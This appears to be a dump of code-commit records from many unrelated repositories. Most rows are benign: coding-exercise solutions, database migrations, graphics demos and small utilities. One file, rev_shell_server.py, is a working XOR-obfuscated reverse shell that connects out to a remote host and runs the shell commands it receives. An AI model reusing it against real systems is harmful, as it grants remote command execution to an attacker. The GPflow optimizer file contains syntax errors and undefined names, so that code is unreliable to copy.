version('0.011', 'e0482d3d5a0522e39132ba54af9f1ce3')
| lgpl-2.1 | Python | |
766eff22b8632ae8548fe30e5b44bc8ca5de29b5 | Create near_ten.py | dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey,dvt32/cpp-journey | Python/CodingBat/near_ten.py | Python/CodingBat/near_ten.py | # http://codingbat.com/prob/p165321
def near_ten(num):
return (num % 10 <= 2) or (num % 10 >= 8)
| mit | Python | |
e143ef5663f1fed402c9c941bd8b18adbf72c02b | add calebasse.url_utils module | ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide | calebasse/urls_utils.py | calebasse/urls_utils.py | from django.core.urlresolvers import RegexURLPattern, RegexURLResolver
class DecoratedURLPattern(RegexURLPattern):
def resolve(self, *args, **kwargs):
result = super(DecoratedURLPattern, self).resolve(*args, **kwargs)
if result:
result.func = self._decorate_with(result.func)
return result
class DecoratedRegexURLResolver(RegexURLResolver):
def resolve(self, *args, **kwargs):
result = super(DecoratedRegexURLResolver, self).resolve(*args, **kwargs)
if result:
result.func = self._decorate_with(result.func)
return result
def decorated_includes(func, includes, *args, **kwargs):
urlconf_module, app_name, namespace = includes
for item in urlconf_module:
if isinstance(item, RegexURLPattern):
item.__class__ = DecoratedURLPattern
item._decorate_with = func
elif isinstance(item, RegexURLResolver):
item.__class__ = DecoratedRegexURLResolver
item._decorate_with = func
return urlconf_module, app_name, namespace
| agpl-3.0 | Python | |
be0e28cfc4628491ba6a2c176cb5458279b94f8d | Create simple_fun_#270_evil_code_medal.py | Kunalpod/codewars,Kunalpod/codewars | simple_fun_#270_evil_code_medal.py | simple_fun_#270_evil_code_medal.py | #Kunal Gautam
#Codewars : @Kunalpod
#Problem name: Simple Fun #270: Evil Code Medal
#Problem level: 7 kyu
def get_sec(time):
return time[0]*3600 + time[1]*60 + time[2]
def evil_code_medal(user_time, gold, silver, bronze):
user_time = get_sec(user_time.split(':'))
gold = get_sec(gold.split(':'))
silver = get_sec(silver.split(':'))
bronze = get_sec(bronze.split(':'))
if user_time < gold: return "Gold"
elif user_time < silver: return "Silver"
elif user_time < bronze: return "Bronze"
else: return "None"
| mit | Python | |
48d0578f32505702d63adc3c580749c4eb18326d | Create most_common_characters.py | sookoor/PythonInterviewPrep | most_common_characters.py | most_common_characters.py | import operator
def most_common_characters(input_string, N):
count = {}
for char in inputString:
if char in count:
count[char] += 1
else:
count[char] = 1
sorted_freq = sorted(count.iteritems(), key=operator.itemgetter(1), reverse=True)
for i in range(min(N, len(sorted_freq))):
print sorted_freq[i][0]
def main():
most_common_characters("aaaaaaaaaaaaaaaaaaakkkkkkkkkkkkkkkkkkkddddddddddddhhhhhhhhhbbbbbbbeeeewqqqer", 10)
if __name__ == "__main__":
main()
| mit | Python | |
c06de87c53a8e42660b885de9d14796cc928c687 | add pwgen | anokata/pythonPetProjects,anokata/pythonPetProjects,anokata/pythonPetProjects,anokata/pythonPetProjects | pwgen.py | pwgen.py | for a in range(10):
for b in range(10):
for c in range(10):
for d in range(10):
for e in range(10):
for f in range(10):
for g in range(10):
for h in range(10):
print("{}{}{}{}{}{}{}{}".format(a,b,c,d,e,f,g,h))
| mit | Python | |
e47094d2b499ee2667384328194cd8f35ce17022 | Add a forgotten file | holkasepsem/python-lessons | sinus_subpixel/sinus_subpixel.py | sinus_subpixel/sinus_subpixel.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pygame
from pygame.locals import *
from subpixel_surface import *
from math import sin, cos
DOTS = 100
def main():
pygame.init()
screen = pygame.display.set_mode((640, 480))
clock = pygame.time.Clock()
dot = pygame.image.load("dot.png")
dot_subpixel = SubPixelSurface(dot, x_level=8)
t = 0.
while True:
for event in pygame.event.get():
if event.type == QUIT:
return
time_passed = clock.tick()
t += time_passed / 3000.
for n in range(DOTS):
a = float(n)/DOTS * sin((t)*.1234)*100
x = sin((t+a)*sin(t/4)) * 200.*sin(t/5) + 320
y = cos(((t*1.234)+a)*sin(t/8)) * 200.*sin(t/4) + 220
screen.blit(dot_subpixel.at(x, y), (x, y))
pygame.display.update()
if __name__ == "__main__":
main()
| mit | Python | |
a3d7561c3c8930a55f7496c817876e4cf6b187bd | Add migration I forgot | fedspendingtransparency/data-act-broker-backend,fedspendingtransparency/data-act-broker-backend | dataactcore/migrations/versions/cd1025ac9399_add_columns_to_AwardProcurement.py | dataactcore/migrations/versions/cd1025ac9399_add_columns_to_AwardProcurement.py | """add columns to AwardProcurement
Revision ID: cd1025ac9399
Revises: a767facf8ea8
Create Date: 2017-09-18 15:05:52.772251
"""
# revision identifiers, used by Alembic.
revision = 'cd1025ac9399'
down_revision = 'a767facf8ea8'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_data_broker():
### commands auto generated by Alembic - please adjust! ###
op.add_column('award_procurement', sa.Column('base_and_all_options_value', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('base_exercised_options_val', sa.Text(), nullable=True))
### end Alembic commands ###
def downgrade_data_broker():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('award_procurement', 'base_exercised_options_val')
op.drop_column('award_procurement', 'base_and_all_options_value')
### end Alembic commands ###
| cc0-1.0 | Python | |
51cf34acc3566804948804f835961b2b281dfbd1 | add 07geometry_shader_blending | mackst/opengl-samples | OpenGL-Examples/07geometry_shader_blending.py | OpenGL-Examples/07geometry_shader_blending.py | # -*- coding: utf-8 -*-
# OpenGL example code - Geometry Shader and Blending
# Uses a geometry shader to expand points to billboard quads.
# The billboards are then blended while drawing to create a galaxy
# made of particles.
import ctypes
import numpy as np
from OpenGL.GL import *
from OpenGL.GL import shaders
from glfw import *
import glm
class Window(object):
def __init__(self, width=640, height=480, title='GLFW opengl window'):
self.width = width
self.height = height
self.title = title
self.window = None
self.__vertexShader = './shaders/%s.vert' % self.title
self.__fragmentShader = './shaders/%s.frag' % self.title
self.__shaderProgram = None
self.__vao = None
def shaderFromFile(self, shaderType, shaderFile):
"""read shader from file and compile it"""
shaderSrc = ''
with open(shaderFile) as sf:
shaderSrc = sf.read()
return shaders.compileShader(shaderSrc, shaderType)
def initGL(self):
"""opengl initialization"""
# load shaders
vertexShader = self.shaderFromFile(GL_VERTEX_SHADER, self.__vertexShader)
fragmentShader = self.shaderFromFile(GL_FRAGMENT_SHADER, self.__fragmentShader)
self.__shaderProgram = shaders.compileProgram(vertexShader, fragmentShader)
if not self.__shaderProgram:
self.close()
# generate and bind the vao
self.__vao = glGenVertexArrays(1)
glBindVertexArray(self.__vao)
# generate and bind the buffer object
vbo = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, vbo)
# data for a fullscreen quad
vertexData = np.array([0,], dtype=np.float32)
# fill with data
glBufferData(GL_ARRAY_BUFFER, vertexData.nbytes, vertexData, GL_STATIC_DRAW)
# set up generic attrib pointers
glEnableVertexAttribArray(0)
glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 6 * 4, None)
glBindVertexArray(0)
# we are drawing 3d objects so we want depth testing
glEnable(GL_DEPTH_TEST)
def renderGL(self):
"""opengl render method"""
# get the time in seconds
t = glfwGetTime()
# clear first
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# use the shader program
glUseProgram(self.__shaderProgram)
# calculate ViewProjection matrix
projection = glm.perspective(90.0, 4.0 / 3.0, .1, 100.0)
# translate the world/view position
view = glm.translate(glm.mat4(1.0), glm.vec3(0.0, 0.0, -5.0))
# make the camera rotate around the origin
view = glm.rotate(view, 90.0 * t, glm.vec3(1.0, 1.0, 1.0))
viewProjection = np.array(projection * view, dtype=np.float32)
# set the uniform
glUniformMatrix4fv(self.__vpLocation, 1, GL_FALSE, viewProjection)
# bind the vao
glBindVertexArray(self.__vao)
# draw
glDrawElements(GL_TRIANGLES, 6*6, GL_UNSIGNED_INT, None)
glBindVertexArray(0)
glUseProgram(0)
def initWindow(self):
"""setup window options. etc, opengl version"""
# select opengl version
glfwWindowHint(GLFW_OPENGL_PROFILE, GLFW_OPENGL_CORE_PROFILE)
glfwWindowHint(GLFW_CONTEXT_VERSION_MAJOR, 3)
glfwWindowHint(GLFW_CONTEXT_VERSION_MINOR, 3)
def show(self):
"""create the window and show it"""
self.initWindow()
self.window = glfwCreateWindow(self.width, self.height, self.title, 0, 0)
if self.window == 0:
glfwTerminate()
raise Exception('failed to open window')
glfwMakeContextCurrent(self.window)
# initialize opengl
self.initGL()
while not glfwWindowShouldClose(self.window):
glfwPollEvents()
self.renderGL()
# check for errors
error = glGetError()
if error != GL_NO_ERROR:
raise Exception(error)
# finally swap buffers
glfwSwapBuffers(self.window)
self.close()
def close(self):
glfwDestroyWindow(self.window)
glfwTerminate()
if __name__ == '__main__':
import os.path
if glfwInit() == GL_FALSE:
raise Exception('failed to init GLFW')
title = os.path.basename(__file__)
win = Window(title=title[:-3])
win.show()
| mit | Python | |
1728765f6a1858086030abb6a96c47bc8c336e6e | Add natural optimizer. | GPflow/GPflow | gpflow/training/natgrad_optimizer.py | gpflow/training/natgrad_optimizer.py | import tensorflow as tf
from . import optimizer
class NatGradOptimizer(optimizer.Optimizer):
"""
"""
def __init__(self, gamma):
self._gamma = gamma
@property
def gamma(self):
"""
"""
return self.gamma
def minimize(self, model, session=None, var_list=None, feed_dict=None,
maxiter=1000, initialize=False, anchor=True, **kwargs):
"""
Minimizes objective function of the model.
:param model: GPflow model with objective tensor.
:param session: Session where optimization will be run.
:param var_list: List of extra variables which should be trained during optimization.
:param feed_dict: Feed dictionary of tensors passed to session run method.
:param maxiter: Number of run interation.
:param initialize: If `True` model parameters will be re-initialized even if they were
initialized before for gotten session.
:param anchor: If `True` trained variable values computed during optimization at
particular session will be synchronized with internal parameter values.
:param kwargs: This is a dictionary of extra parameters for session run method.
"""
if model is None or not isinstance(model, Model):
raise ValueError('Unknown type passed for optimization.')
session = model.enquire_session(session)
self._model = model
objective = model.objective
with session.graph.as_default(), tf.name_scope(self.name):
full_var_list = self._gen_var_list(model, var_list)
# Create optimizer variables before initialization.
self._minimize_operation = self.optimizer.minimize(
objective, var_list=full_var_list, **kwargs)
model.initialize(session=session, force=initialize)
self._initialize_optimizer(session, full_var_list)
feed_dict = self._gen_feed_dict(model, feed_dict)
for _i in range(maxiter):
session.run(self.minimize_operation, feed_dict=feed_dict)
if anchor:
model.anchor(session)
def _forward_gradients(ys, xs, d_xs):
"""
Forward-mode pushforward analogous to the pullback defined by tf.gradients.
With tf.gradients, grad_ys is the vector being pulled back, and here d_xs is
the vector being pushed forward, i.e. this computes (d ys / d xs)^T d_xs.
:param ys: list of variables being differentiated (tensor)
:param xs: list of variables to differentiate wrt (tensor)
:param d_xs: list of gradients to push forward (same shapes as ys)
:return: the specified moment of the variational distribution
"""
v = [tf.placeholder(y.dtype) for y in ys]
g = tf.gradients(ys, xs, grad_ys=v)
return tf.gradients(g, v, grad_ys=d_xs)
def _build_natgrad_step_op(objective, q_mu_param, q_sqrt_param, xi_transform=None):
"""
"""
xi_transforms = XiNat() if xi_transform is None else xi_transform
q_mu_u, q_sqrt_u = q_mu_param.unconstrained_tensor, q_sqrt_param.unconstrained_tensor
q_mu, q_sqrt = q_mu_param.constrained_tensor, q_sqrt_param.constrained_tensor
etas = meanvarsqrt_to_expectation(q_mu, q_sqrt)
nats = meanvarsqrt_to_natural(q_mu, q_sqrt)
dL_d_mean, dL_d_varsqrt = tf.gradients(objective, [q_mu, q_sqrt])
_nats = expectation_to_meanvarsqrt(*etas)
dL_detas = tf.gradients(_nats, etas, grad_ys=[dL_d_mean, dL_d_varsqrt])
_xis = xi_transform.naturals_to_xi(*nats)
nat_dL_xis = forward_gradients(_xis, nats, dL_detas)
xis = xi_transform.meanvarsqrt_to_xi(q_mu, q_sqrt)
xis_new = [xis[i] - self.gamma * nat_dL_xis[i] for i in range(2)]
mean_new, varsqrt_new = xi_transform.xi_to_meanvarsqrt(xis_new)
mean_new.set_shape(q_mu_param.shape)
varsqrt_new.set_shape(q_sqrt_param.shape)
q_mu_assign = tf.assign(q_mu_u, q_mu_param.transform.backward_tensor(mean_new)))
q_sqrt_assign = tf.assign(q_sqrt_u, q_sqrt_param.transform.backward_tensor(varsqrt_new)))
return q_mu_assign, q_sqrt_assign
def _build_natgrad_step_ops(objective, params_and_transforms):
ops = [_build_natgrad_step_op() in q_mu, q_sqrt, xi_transform in params_and_transforms]
ops = list(sum(ops, ()))
return tf.group(ops)
| apache-2.0 | Python | |
36e730ea3d984b8da8081397d4ac0c4dd3bb82f2 | add mongoDB cache demo. | yanbober/SmallReptileTraining | PersistenceSpider/demo_mongodb_persistence.py | PersistenceSpider/demo_mongodb_persistence.py | import pymongo
'''
Python3 MongoDB数据库持久化演示
'''
class MongoDBPersistence(object):
def __init__(self):
self.conn = None
self.database = None
def connect(self, database):
try:
self.conn = pymongo.MongoClient('mongodb://localhost:27017/')
self.database = self.conn[database]
except Exception as e:
print("MongoDB connect failed." + str(e))
def close(self):
try:
if self.conn is not None:
self.conn.close()
except BaseException as e:
print("MongoDB close failed."+str(e))
def insert_table_dict(self, dict_data=None):
if self.conn is None or self.database is None:
print('Please ensure you have connected to MongoDB server!')
return False
if dict_data is None:
return False
try:
collection = self.database['DemoTable']
collection.save(dict_data)
except BaseException as e:
print("MongoDB insert error." + str(e))
return True
def get_dict_by_name(self, name=None):
if self.conn is None or self.database is None:
print('Please ensure you have connected to MongoDB server!')
return None
collection = self.database['DemoTable']
if name is None:
documents = collection.find()
else:
documents = collection.find({"name": name})
document_list = list()
for document in documents:
document_list.append(document)
return document_list
if __name__ == '__main__':
t_mysql = MongoDBPersistence()
t_mysql.connect("DemoDatabase")
t_mysql.insert_table_dict({'name': 'Test1', 'content': 'XXXXXXXXXXXXX'})
t_mysql.insert_table_dict({'name': 'Test2', 'content': 'vvvvvvvvvvvv'})
t_mysql.insert_table_dict({'name': 'Test3', 'content': 'qqqqqqqqqqqq'})
t_mysql.insert_table_dict({'name': 'Test4', 'content': 'wwwwwwwwwwwww'})
print('MongoDBPersistence get Test2: ' + str(t_mysql.get_dict_by_name('Test2')))
print('MongoDBPersistence get All: ' + str(t_mysql.get_dict_by_name()))
t_mysql.close() | mit | Python | |
930630e886d8666844639e7cf9d273bd8e4c2115 | Create rev_shell_server.py | panagiks/reverse_shell,panagiks/RSPET | Server/rev_shell_server.py | Server/rev_shell_server.py | #!/usr/bin/python
import socket
import subprocess
import sys
def main():
try:
RHOST = sys.argv[1]
RPORT = 9000
except:
print ("Must provide hotst")
sys.exit()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST,RPORT))
while True:
#recieve XOR encoded data
data = s.recv(1024)
#XOR the data again with a '/x41' to get back to normal
en_data = bytearray(data)
for i in range(len(en_data)):
en_data[i] ^=0x41
if en_data == 'killMe':
break
#Execute decoded command
comm = subprocess.Popen(str(en_data), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
STDOUT,STDERR = comm.communicate()
#Encode output
if STDOUT:
en_STDOUT = bytearray(STDOUT)
else:
en_STDOUT = bytearray("Command not recognised")
for i in range(len(en_STDOUT)):
en_STDOUT[i] ^=0x41
try:
s.send(en_STDOUT)
except:
sys.exit()
s.close()
#Start Here!
if __name__ == "__main__":
main()
| mit | Python | |
921e4fe305e7d39347635c99fd4f9cc84ed7e534 | Add ImageTextAnnotation migration | comic/comic-django,comic/comic-django,comic/comic-django,comic/comic-django,comic/comic-django | app/grandchallenge/annotations/migrations/0005_imagetextannotation.py | app/grandchallenge/annotations/migrations/0005_imagetextannotation.py | # Generated by Django 2.2.2 on 2019-07-11 10:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("cases", "0011_auto_20190314_1453"),
(
"annotations",
"0004_imagepathologyannotation_imagequalityannotation_retinaimagepathologyannotation",
),
]
operations = [
migrations.CreateModel(
name="ImageTextAnnotation",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
serialize=False,
),
),
("modified", models.DateTimeField(auto_now=True)),
(
"created",
models.DateTimeField(default=django.utils.timezone.now),
),
("text", models.TextField()),
(
"grader",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
(
"image",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="cases.Image",
),
),
],
options={
"ordering": ["-created"],
"get_latest_by": "created",
"abstract": False,
},
)
]
| apache-2.0 | Python | |
9a567d283cc2e72e3590305f81b3879d7f2557fa | include json_io.py from another older project. | Who8MyLunch/HackingForMovieTrends | json_io.py | json_io.py |
from __future__ import division, print_function, unicode_literals
import numpy as np
import simplejson as json
#
# Helpers.
#
MARKER = ':ndar!'
class NumpyJSONEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
name = '%s.%s' % (MARKER, obj.dtype.name)
encoded_obj = {name: obj.tolist()}
else:
encoded_obj = json.JSONEncoder.default(self, obj)
# Done.
return encoded_obj
def numpy_hook(decoded_obj):
if isinstance(decoded_obj, dict):
if len(decoded_obj) == 1:
key, val = decoded_obj.items()[0]
if MARKER in key:
dtype_name = key[len(MARKER) + 1:]
decoded_obj = np.asarray(val, dtype=dtype_name)
# Done.
return decoded_obj
#################################################
def read(fname):
"""Read serialized data from JSON file, decode into Python object(s).
Parameters
----------
fname : string file name.
"""
# Read string from JSON file.
with open(fname, 'r') as fi:
serial = fi.read()
# Decode.
decoder = json.JSONDecoder(object_hook=numpy_hook)
data = decoder.decode(serial)
return data
def write(fname, data):
"""Encode Python object(s), write to JSON file.
Parameters
----------
fname : string file name.
data : Data to be written to file. May include Numpy arrays.
"""
# Encode to string.
encoder = NumpyJSONEncoder(check_circular=True, indent=' ')
serial = encoder.encode(data)
# Write to file.
with open(fname, 'w') as fo:
fo.write(serial)
| mit | Python | |
55cc66bc6d1c2c6280bb959bea23e14b4f26c741 | Add Two Numbers problem | zsmountain/leetcode,zsmountain/leetcode,zsmountain/leetcode | add_two_numbers.py | add_two_numbers.py | '''
You are given two linked lists representing two non-negative numbers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.
Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)
Output: 7 -> 0 -> 8
'''
'''
The main idea is quite simple, but need to pay attention to edge cases, e.g. there is still carry after adding is done (1 + 99)
'''
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
# @return a ListNode
def addTwoNumbers(self, l1, l2):
c = 0
head = None
pre = None
while l1 and l2:
if l1.val + l2.val + c >= 10:
node = ListNode(l1.val + l2.val + c - 10)
c = 1;
else:
node = ListNode(l1.val + l2.val + c)
c = 0
if not head:
head = node
pre = node
else:
pre.next = node
pre = node
l1 = l1.next
l2 = l2.next
#l1 is longer than l2
while l1:
if l1.val + c >= 10:
node = ListNode(l1.val + c - 10)
c = 1
else:
node = ListNode(l1.val + c)
c = 0
pre.next = node
pre = node
l1 = l1.next
#ls is longer than l1
while l2:
if l2.val + c >= 10:
node = ListNode(l2.val + c - 10)
c = 1
else:
node = ListNode(l2.val + c)
c = 0
pre.next = node
pre = node
l2 = l2.next
# adding is done, check if still has carry
if c:
node = ListNode(c)
pre.next = node
pre = node
return head
if __name__ == '__main__':
s = Solution()
p1 = ListNode(2)
p2 = ListNode(4)
p3 = ListNode(3)
p4 = ListNode(5)
p1.next = p2
p2.next = p3
p3.next = p4
l1 = p1
n1 = ListNode(5)
n2 = ListNode(6)
n3 = ListNode(4)
n1.next = n2
n2.next = n3
l2 = n1
l = s.addTwoNumbers(l1, l2)
while l:
print l.val, ' -> ',
l = l.next
print "\n"
l1 = ListNode(5)
l2 = ListNode(5)
l = s.addTwoNumbers(l1, l2)
while l:
print l.val, ' -> ',
l = l.next
print "\n"
l1 = ListNode(1)
n1 = ListNode(9)
n2 = ListNode(9)
n1.next = n2
l2 = n1
l = s.addTwoNumbers(l1, l2)
while l:
print l.val, ' -> ',
l = l.next
print "\n"
| apache-2.0 | Python | |
a3f23b804265bd59473873c2aa071188a73a9a9e | Test fail cases for custom codegen | cpcloud/slumba,cpcloud/slumba | slumba/tests/test_numbaext.py | slumba/tests/test_numbaext.py | import pytest
from numba import boolean, njit, int64, TypingError
from slumba.numbaext import not_null, sizeof, unsafe_cast
def test_sizeof_invalid():
dec = njit(int64(int64))
with pytest.raises(TypingError):
@dec
def bad_sizeof(x):
return sizeof(x)
def test_not_null_invalid():
dec = njit(boolean(int64))
with pytest.raises(TypingError):
@dec
def bad_not_null(x):
return not_null(x)
def test_unsafe_case_invalid():
dec = njit(int64(int64))
with pytest.raises(TypingError):
@dec
def bad_unsafe_cast(x):
return unsafe_cast(x, int64)
| apache-2.0 | Python | |
a1ae01bada1d500bd7f9f7f0f2deb458bfa6d2d1 | Add the serial python test | Pitchless/arceye,Pitchless/arceye | bin/serial_test.py | bin/serial_test.py | #!/usr/bin/env python
from serial import Serial
from time import sleep
ser = Serial('/dev/ttyUSB0', 9600)
sleep(3) # wait for the board to reset
print "start"
print "write"
ser.write("hello\n")
print "read"
line = ser.readline()
print "GOT %s"%line
print "write world..."
ser.write("world\n")
print "read"
line = ser.readline()
print "GOT %s"%line
line = ser.readline()
print "GOT %s"%line
cmd = ""
while not cmd == "q":
cmd = raw_input(">> ")
ser.write(cmd+"\n")
out = ser.readline()
out = ser.readline()
print out
| apache-2.0 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.